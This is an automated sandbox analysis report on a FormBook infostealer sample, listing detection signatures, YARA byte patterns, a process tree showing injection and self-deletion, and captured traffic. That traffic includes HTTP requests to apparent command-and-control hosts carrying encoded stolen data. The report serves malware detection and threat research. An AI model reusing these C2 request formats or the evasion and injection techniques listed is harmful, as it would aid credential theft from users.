Play interactive tourEdit tour

# Analysis Report Scan_06032020.exe

## Overview

### General Information

 Sample Name: Scan_06032020.exe MD5: c2f53f0cfafa04b343af62cccedcee13 SHA1: b189bf5ac157a99e16b4b81200bb08c6d9b55e7c SHA256: 459e0f1ce8ec71d78d27f50fa6978046b9fb741f322f66cb300332fce233da25 Most interesting Screenshot:

### Detection

FormBook
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

 System is w10x64Scan_06032020.exe (PID: 2616 cmdline: 'C:\Users\user\Desktop\Scan_06032020.exe' MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)Scan_06032020.exe (PID: 5092 cmdline: {path} MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)Scan_06032020.exe (PID: 952 cmdline: {path} MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)Scan_06032020.exe (PID: 4304 cmdline: {path} MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)explorer.exe (PID: 2880 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)NETSTAT.EXE (PID: 4024 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)cmd.exe (PID: 4520 cmdline: /c del 'C:\Users\user\Desktop\Scan_06032020.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 4640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)ufipp6ljxlz.exe (PID: 4924 cmdline: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)ufipp6ljxlz.exe (PID: 4316 cmdline: {path} MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)wlanext.exe (PID: 4168 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)cleanup

## Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18429:\$sqlite3step: 68 34 1C 7B E1
• 0x1853c:\$sqlite3step: 68 34 1C 7B E1
• 0x18458:\$sqlite3text: 68 38 2A 90 C5
• 0x1857d:\$sqlite3text: 68 38 2A 90 C5
• 0x1846b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x18593:\$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98b8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b22:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x157a5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15291:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x158a7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x15a1f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa69a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1450c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb393:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1ab17:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1bb1a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x106519:\$sqlite3step: 68 34 1C 7B E1
• 0x10662c:\$sqlite3step: 68 34 1C 7B E1
• 0x132139:\$sqlite3step: 68 34 1C 7B E1
• 0x13224c:\$sqlite3step: 68 34 1C 7B E1
• 0x106548:\$sqlite3text: 68 38 2A 90 C5
• 0x10666d:\$sqlite3text: 68 38 2A 90 C5
• 0x132168:\$sqlite3text: 68 38 2A 90 C5
• 0x13228d:\$sqlite3text: 68 38 2A 90 C5
• 0x10655b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x106683:\$sqlite3blob: 68 53 D8 7F 8C
• 0x13217b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x1322a3:\$sqlite3blob: 68 53 D8 7F 8C
Click to see the 28 entries
SourceRuleDescriptionAuthorStrings
4.2.Scan_06032020.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
4.2.Scan_06032020.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18429:\$sqlite3step: 68 34 1C 7B E1
• 0x1853c:\$sqlite3step: 68 34 1C 7B E1
• 0x18458:\$sqlite3text: 68 38 2A 90 C5
• 0x1857d:\$sqlite3text: 68 38 2A 90 C5
• 0x1846b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x18593:\$sqlite3blob: 68 53 D8 7F 8C
4.2.Scan_06032020.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98b8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b22:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x157a5:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15291:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x158a7:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x15a1f:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa69a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1450c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb393:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1ab17:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1bb1a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
17.2.ufipp6ljxlz.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
17.2.ufipp6ljxlz.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18429:\$sqlite3step: 68 34 1C 7B E1
• 0x1853c:\$sqlite3step: 68 34 1C 7B E1
• 0x18458:\$sqlite3text: 68 38 2A 90 C5
• 0x1857d:\$sqlite3text: 68 38 2A 90 C5
• 0x1846b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x18593:\$sqlite3blob: 68 53 D8 7F 8C
Click to see the 7 entries

## Sigma Overview

No Sigma rule has matched

## Signature Overview

### AV Detection:

 Multi AV Scanner detection for domain / URL Show sources
 Source: www.porcber.com Virustotal: Detection: 7% Perma Link Source: http://www.porcber.com Virustotal: Detection: 7% Perma Link
 Multi AV Scanner detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Temp\Qor0xv4i\ufipp6ljxlz.exe Virustotal: Detection: 16% Perma Link Source: C:\Users\user\AppData\Local\Temp\Qor0xv4i\ufipp6ljxlz.exe ReversingLabs: Detection: 48%
 Multi AV Scanner detection for submitted file Show sources
 Source: Scan_06032020.exe Virustotal: Detection: 16% Perma Link Source: Scan_06032020.exe ReversingLabs: Detection: 48%
 Yara detected FormBook Show sources
 Source: Yara match File source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPE
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 17.2.ufipp6ljxlz.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 4.2.Scan_06032020.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

 Found inlined nop instructions (likely shell or obfuscated code) Show sources
 Source: C:\Users\user\Desktop\Scan_06032020.exe Code function: 4x nop then pop edi 4_2_00417D66 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 6_2_02E77D66 Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Code function: 4x nop then pop edi 17_2_00417D66

### Networking:

 Uses netstat to query active network connections and open ports Show sources
 Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=zRviVb12Px76SVCKitHf+uVyG4hjRZm88E4tC4j/EoSJrWOXPrlkHBEChoOc3I+b1pYC HTTP/1.1Host: www.icbjesusdenazaret.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /mq3/?qFNHgHIH=2djJOWHKUa/XxXSGb5U/NgPrp1f7EPZ+3gOEC9jiqnhi3aunmcDc7upH1tDbPKdrqRi+&1bxh=3fSHFPhPtFX80vu0 HTTP/1.1Host: www.porcber.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=KqoVQGmIJAwVdvnbXHFhC3/cGIUPqT0Z2GEszuVtRwHyjq2IhIJtEgxo1RriYdWCfaHj HTTP/1.1Host: www.hugoph.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware Show sources
 Source: Joe Sandbox View IP Address: 199.34.228.59 199.34.228.59
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.porcber.comConnection: closeContent-Length: 146542Cache-Control: no-cacheOrigin: http://www.porcber.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.porcber.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 71 46 4e 48 67 48 49 48 3d 7e 5f 76 7a 51 32 6d 62 65 74 69 71 69 55 72 38 43 63 41 35 58 30 48 6b 6e 58 37 39 54 72 5a 48 67 48 7a 5a 45 36 37 69 6a 6b 64 65 33 72 71 41 77 74 7e 7a 70 35 63 73 33 73 28 41 45 75 52 59 75 30 61 48 4e 46 4d 66 64 65 4a 7a 52 4c 68 74 28 6f 6c 43 53 4a 68 50 62 53 49 47 50 33 6a 6f 36 6c 41 30 76 32 61 6f 32 39 66 79 71 72 46 61 59 4a 78 79 66 65 6e 44 78 32 46 7a 37 75 7e 32 30 36 58 39 57 6f 56 6e 45 53 48 6d 79 4c 32 33 49 78 78 70 76 58 52 64 74 5f 56 35 62 76 52 50 66 53 70 43 69 6c 4b 45 53 74 64 7a 65 4c 44 55 28 4c 41 61 46 76 75 7a 37 70 35 4d 65 49 51 6d 57 54 33 76 38 62 4c 6b 36 67 72 68 46 57 34 44 68 75 30 74 79 72 33 68 73 79 28 68 62 65 56 32 79 79 4f 49 51 36 6e 73 42 77 56 61 6f 6a 4f 53 43 49 68 6f 48 54 45 74 6a 50 30 42 50 36 58 4c 66 50 4d 55 44 57 73 48 68 72 6a 46 61 2d 54 6f 48 66 64 71 34 32 50 41 6d 45 44 77 64 7a 49 4f 59 69 39 43 53 36 45 6a 63 4a 74 34 70 63 50 49 55 72 77 5a 48 4a 48 6a 75 31 4c 69 41 63 6b 7a 46 79 45 52 49 34 30 4b 33 79 34 64 4f 62 48 43 78 33 65 53 66 65 32 4b 51 54 67 39 30 47 50 74 44 6e 33 52 6f 50 75 7a 56 75 74 4c 59 64 4b 39 46 39 63 31 4a 63 68 56 4f 7a 7e 30 4c 45 69 69 46 54 70 69 28 45 67 30 35 53 71 73 6e 34 34 4c 74 7a 28 61 39 49 6f 44 6d 48 54 77 6d 42 65 69 65 34 34 4d 35 61 37 4a 7a 4c 69 68 69 70 68 36 31 6f 6a 37 61 6e 76 61 52 45 52 63 72 78 5a 7a 79 63 48 77 38 79 6e 39 75 71 64 71 28 68 47 44 4a 44 4c 73 46 4c 51 6f 7a 65 39 71 35 35 55 35 77 78 63 33 62 6a 77 73 68 34 4c 62 5a 38 51 66 37 64 38 4b 72 6d 5a 68 53 42 6a 64 64 76 76 47 41 4e 76 56 67 37 44 4e 77 2d 78 7a 79 56 36 6c 4f 31 54 6e 36 71 69 6b 37 33 56 4e 41 42 4e 58 77 53 43 56 64 55 50 61 65 4d 38 76 54 44 71 64 30 4d 55 78 46 54 68 68 55 58 31 4b 4b 5f 73 4b 36 63 70 31 6c 56 6f 69 7e 32 71 44 54 4f 76 4b 37 59 39 46 7a 56 72 6c 47 77 43 50 34 63 74 6e 30 55 74 41 39 4a 64 51 50 6e 52 4c 32 6a 65 32 4a 34 6a 41 5a 55 76 66 76 72 41 51 31 6d 61 69 46 69 51 65 79 51 46 5f 77 58 49 4d 4c 33 67 52 6b 56 79 44 7e 4a 75 4c 30 73 67 61 4f 6e 58 4a 35 65 39 42 67 30 32 44 6e 72 4f 7a 6b 7a 41 75 63 41 36 56 59 52 4d 52 42 71 73 57 53 6f 4a 66 45 6b 45 36 7a 49 45 56 52 59 48 56 46 30 41 30 66 37 79 34 62 65 41 61 79 76 69 57 39 31 4b 6f 64 42 4d 4b 69 31 51 4e 73 47 79 30 62 4a 78 38 78 30 58 52 4f 58 74 72 53 79 4c 79 4f 4b 4e 41 50 46 4a 4c 75 65 65 44 63 51 67 4f 36 7a 56 64 51 48 4d 5f 53 72 6f 6b 42 70 58 62 70 5a 38 48 68 4a 61 4d 34 45 42 4e 59 6f 75 46 64 4f 41 5f 4f 69 7a 61 76 52 7a 4a 70 32 7e 34 39 54 57 2d 39 78 28 68 44 4d 6f 62 55 58 6f 62 31 55 4b 6f 43 49 76 79 6d 4f 6a 5f 31 48 7 Source: global traffic HTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.hugoph.comConnection: closeContent-Length: 146542Cache-Control: no-cacheOrigin: http://www.hugoph.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hugoph.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 71 46 4e 48 67 48 49 48 3d 43 49 6b 76 4f 68 6a 4d 43 6d 64 32 4b 75 36 6a 4a 51 51 34 62 43 48 39 48 34 6b 7a 69 6a 73 79 67 44 46 4c 6f 76 6c 69 64 68 44 71 69 61 65 51 69 62 45 49 44 67 30 76 72 67 7a 61 46 66 57 68 65 38 6e 43 53 4c 74 58 44 71 66 6d 37 4c 75 78 4a 4a 45 58 52 4d 55 71 66 64 6a 6b 48 4d 70 5a 48 64 33 4f 7a 58 59 45 45 58 50 73 47 49 7a 2d 39 37 35 2d 74 4c 30 6d 77 6f 6d 72 51 5a 4a 63 57 55 55 46 36 41 68 4a 58 44 38 78 44 54 57 75 73 31 78 43 7e 77 53 4e 52 50 38 65 70 70 64 78 41 50 46 4c 49 62 41 4c 46 58 46 31 64 62 59 45 42 75 78 2d 49 45 50 74 6c 63 55 72 76 36 4c 47 63 52 78 48 54 47 62 74 28 65 33 53 33 7a 74 45 55 48 46 31 35 6d 6a 61 70 64 68 71 50 64 56 58 62 46 62 43 70 6e 72 49 6c 73 38 54 69 52 32 61 33 5f 56 68 50 4d 49 4b 39 36 67 6e 37 79 62 32 6d 46 33 4d 52 77 39 68 4f 54 54 54 76 4f 41 63 71 52 79 67 39 35 58 4e 64 45 34 57 51 79 33 48 4d 2d 6e 6e 53 72 42 30 52 55 6f 66 43 6c 49 76 76 76 70 68 5a 46 64 6c 68 4f 33 61 53 45 61 41 69 4a 6c 42 46 52 47 72 55 73 66 45 63 45 63 44 63 53 74 4d 4c 33 61 71 6b 79 62 41 4c 4a 50 30 74 45 51 5f 31 71 33 67 63 41 50 55 64 66 65 32 76 45 6b 49 72 52 57 67 63 5f 46 67 51 4e 33 51 56 61 38 30 71 68 6d 72 6e 68 6b 68 75 49 77 54 6e 50 7e 6f 62 43 66 34 58 6d 72 6b 39 4d 63 37 69 46 6c 38 49 74 72 47 76 72 50 71 69 32 48 5f 76 2d 4d 7a 33 6e 74 37 79 52 72 74 54 4a 66 58 6d 37 54 33 73 43 35 4b 64 68 37 31 37 4d 31 64 6c 47 4d 6c 33 35 47 6d 4e 55 42 52 48 30 35 71 49 74 6f 6e 62 53 39 47 6a 4d 54 6a 36 44 59 59 62 54 72 7a 5a 4e 4c 66 56 39 61 4b 28 36 65 51 45 52 37 41 68 59 65 45 37 77 59 6b 56 73 72 58 37 39 77 62 6a 74 76 64 69 6a 32 4e 42 34 7e 55 56 6e 62 68 76 66 6a 68 61 37 52 45 74 7a 66 77 6f 39 59 32 4d 4e 30 2d 65 6a 36 42 35 66 73 7a 73 53 78 70 45 32 4e 46 52 42 78 68 79 35 67 78 72 53 4c 56 62 6b 6a 61 6c 43 73 52 4f 65 4b 41 62 38 35 42 34 79 4c 2d 64 53 58 31 6f 56 44 32 54 45 68 79 38 67 35 37 51 41 73 41 66 64 33 5f 50 4e 31 33 72 42 75 65 76 6e 56 78 32 41 4c 43 62 42 72 4a 50 72 28 59 31 75 75 7a 4c 4c 51 54 43 70 77 48 39 36 42 35 39 46 55 5a 68 6d 50 35 62 30 6b 4a 38 68 4a 4e 55 34 38 36 75 69 61 58 6c 42 4f 58 69 71 66 41 38 4b 6e 49 41 74 6e 32 44 75 33 30 64 65 66 59 6d 75 37 57 35 58 34 39 6f 42 73 59 47 6d 38 6c 4f 69 5a 45 69 35 35 32 79 68 50 45 41 70 66 58 30 6b 37 77 47 50 7e 4f 59 4c 7a 64 4d 4c 49 78 78 41 63 32 50 6a 61 36 39 42 65 48 47 50 4d 78 6b 31 75 52 69 6a 6f 71 50 43 55 32 67 74 74 77 71 41 6f 75 56 64 4e 75 55 59 62 67 76 35 79 4e 6d 37 39 6a 58 64 48 42 39 31 61 46 37 79 6d 50 62 6c 7e 36 50 72 59 52 69 73 30 44 4b 4e 78 69 63 49 43 5
 Source: global traffic HTTP traffic detected: GET /mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=zRviVb12Px76SVCKitHf+uVyG4hjRZm88E4tC4j/EoSJrWOXPrlkHBEChoOc3I+b1pYC HTTP/1.1Host: www.icbjesusdenazaret.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /mq3/?qFNHgHIH=2djJOWHKUa/XxXSGb5U/NgPrp1f7EPZ+3gOEC9jiqnhi3aunmcDc7upH1tDbPKdrqRi+&1bxh=3fSHFPhPtFX80vu0 HTTP/1.1Host: www.porcber.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=KqoVQGmIJAwVdvnbXHFhC3/cGIUPqT0Z2GEszuVtRwHyjq2IhIJtEgxo1RriYdWCfaHj HTTP/1.1Host: www.hugoph.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: www.icbjesusdenazaret.net
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.porcber.comConnection: closeContent-Length: 146542Cache-Control: no-cacheOrigin: http://www.porcber.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.porcber.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 71 46 4e 48 67 48 49 48 3d 7e 5f 76 7a 51 32 6d 62 65 74 69 71 69 55 72 38 43 63 41 35 58 30 48 6b 6e 58 37 39 54 72 5a 48 67 48 7a 5a 45 36 37 69 6a 6b 64 65 33 72 71 41 77 74 7e 7a 70 35 63 73 33 73 28 41 45 75 52 59 75 30 61 48 4e 46 4d 66 64 65 4a 7a 52 4c 68 74 28 6f 6c 43 53 4a 68 50 62 53 49 47 50 33 6a 6f 36 6c 41 30 76 32 61 6f 32 39 66 79 71 72 46 61 59 4a 78 79 66 65 6e 44 78 32 46 7a 37 75 7e 32 30 36 58 39 57 6f 56 6e 45 53 48 6d 79 4c 32 33 49 78 78 70 76 58 52 64 74 5f 56 35 62 76 52 50 66 53 70 43 69 6c 4b 45 53 74 64 7a 65 4c 44 55 28 4c 41 61 46 76 75 7a 37 70 35 4d 65 49 51 6d 57 54 33 76 38 62 4c 6b 36 67 72 68 46 57 34 44 68 75 30 74 79 72 33 68 73 79 28 68 62 65 56 32 79 79 4f 49 51 36 6e 73 42 77 56 61 6f 6a 4f 53 43 49 68 6f 48 54 45 74 6a 50 30 42 50 36 58 4c 66 50 4d 55 44 57 73 48 68 72 6a 46 61 2d 54 6f 48 66 64 71 34 32 50 41 6d 45 44 77 64 7a 49 4f 59 69 39 43 53 36 45 6a 63 4a 74 34 70 63 50 49 55 72 77 5a 48 4a 48 6a 75 31 4c 69 41 63 6b 7a 46 79 45 52 49 34 30 4b 33 79 34 64 4f 62 48 43 78 33 65 53 66 65 32 4b 51 54 67 39 30 47 50 74 44 6e 33 52 6f 50 75 7a 56 75 74 4c 59 64 4b 39 46 39 63 31 4a 63 68 56 4f 7a 7e 30 4c 45 69 69 46 54 70 69 28 45 67 30 35 53 71 73 6e 34 34 4c 74 7a 28 61 39 49 6f 44 6d 48 54 77 6d 42 65 69 65 34 34 4d 35 61 37 4a 7a 4c 69 68 69 70 68 36 31 6f 6a 37 61 6e 76 61 52 45 52 63 72 78 5a 7a 79 63 48 77 38 79 6e 39 75 71 64 71 28 68 47 44 4a 44 4c 73 46 4c 51 6f 7a 65 39 71 35 35 55 35 77 78 63 33 62 6a 77 73 68 34 4c 62 5a 38 51 66 37 64 38 4b 72 6d 5a 68 53 42 6a 64 64 76 76 47 41 4e 76 56 67 37 44 4e 77 2d 78 7a 79 56 36 6c 4f 31 54 6e 36 71 69 6b 37 33 56 4e 41 42 4e 58 77 53 43 56 64 55 50 61 65 4d 38 76 54 44 71 64 30 4d 55 78 46 54 68 68 55 58 31 4b 4b 5f 73 4b 36 63 70 31 6c 56 6f 69 7e 32 71 44 54 4f 76 4b 37 59 39 46 7a 56 72 6c 47 77 43 50 34 63 74 6e 30 55 74 41 39 4a 64 51 50 6e 52 4c 32 6a 65 32 4a 34 6a 41 5a 55 76 66 76 72 41 51 31 6d 61 69 46 69 51 65 79 51 46 5f 77 58 49 4d 4c 33 67 52 6b 56 79 44 7e 4a 75 4c 30 73 67 61 4f 6e 58 4a 35 65 39 42 67 30 32 44 6e 72 4f 7a 6b 7a 41 75 63 41 36 56 59 52 4d 52 42 71 73 57 53 6f 4a 66 45 6b 45 36 7a 49 45 56 52 59 48 56 46 30 41 30 66 37 79 34 62 65 41 61 79 76 69 57 39 31 4b 6f 64 42 4d 4b 69 31 51 4e 73 47 79 30 62 4a 78 38 78 30 58 52 4f 58 74 72 53 79 4c 79 4f 4b 4e 41 50 46 4a 4c 75 65 65 44 63 51 67 4f 36 7a 56 64 51 48 4d 5f 53 72 6f 6b 42 70 58 62 70 5a 38 48 68 4a 61 4d 34 45 42 4e 59 6f 75 46 64 4f 41 5f 4f 69 7a 61 76 52 7a 4a 70 32 7e 34 39 54 57 2d 39 78 28 68 44 4d 6f 62 55 58 6f 62 31 55 4b 6f 43 49 76 79 6d 4f 6a 5f 31 48 7
 Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jun 2020 07:23:52 GMTServer: ApacheSet-Cookie: is_mobile=0; path=/; domain=www.icbjesusdenazaret.netVary: X-W-SSL,User-AgentSet-Cookie: language=en; expires=Thu, 18-Jun-2020 07:23:52 GMT; Max-Age=1209600; path=/Cache-Control: privateX-Host: pages23.sf2p.intern.weebly.netX-UA-Compatible: IE=edge,chrome=1Content-Length: 3803Content-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 67 64 70 72 2f 67 64 70 72 73 63 72 69 70 74 2e 6a 73 3f 62 75 69 6c 64 54 69 6d 65 3d 31 35 39 31 32 31 32 39 39 30 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 31 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 64 65 76 65 6c 6f 70 65 72 2f 6e 6f 6e 65 2e 69 